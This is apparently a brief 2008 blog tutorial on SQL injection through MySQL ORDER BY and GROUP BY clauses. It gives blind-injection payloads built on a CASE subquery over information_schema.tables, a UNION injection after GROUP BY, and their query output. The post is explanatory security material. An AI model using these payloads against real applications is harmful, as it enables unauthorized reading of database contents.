Injection in Order by, Group by Clause

August 1, 2008

Exploiting SQL Injections when the input goes in the order by clause, is a bit tricky as after 'order by' clause union queries are not permitted. The following could be used in such scenario to form blind sql injection cases:

mysql> select id from news where id =1 order by 1, (select case when (1=1) then 1 else 1*(select table_name from information_schema.tables)end)=1;

+——+

| id   |

+——+

|    1 | 

+——+

1 row in set (0.00 sec)

—-

mysql> select id from news where id =1 order by 1, (select case when (1=2) then 1 else 1*(select table_name from information_schema.tables)end)=1;

ERROR 1242 (21000): Subquery returns more than 1 row

—–

For injections where user's input goes to the group by clause, union queries can be used although the above technique will also work for blind injection examples:  mysql> select id from news where id =1 group by id union select 2222;

+——+

| id   |

+——+

|    1 |

| 2222 | 

+——+

2 rows in set (0.00 sec) 

Comments

6 Comments

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Trackback